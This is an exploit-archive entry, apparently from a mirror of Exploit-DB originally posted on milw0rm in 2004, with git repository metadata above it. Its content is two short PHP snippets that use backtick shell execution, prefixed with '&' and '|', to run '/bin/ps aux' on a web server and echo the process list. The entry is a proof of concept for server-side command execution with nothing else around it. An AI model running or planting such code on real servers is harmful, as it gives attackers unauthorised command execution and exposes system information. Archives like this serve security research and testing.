exploit-db-mirror/exploits/php/webapps/384.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

12 lines
No EOL
154 B
Text

<?php
$blah = `& /bin/ps aux`;
echo nl2br($blah);
?>
<?php
$blah = `| /bin/ps aux`;
echo nl2br($blah);
?>
# milw0rm.com [2004-08-08]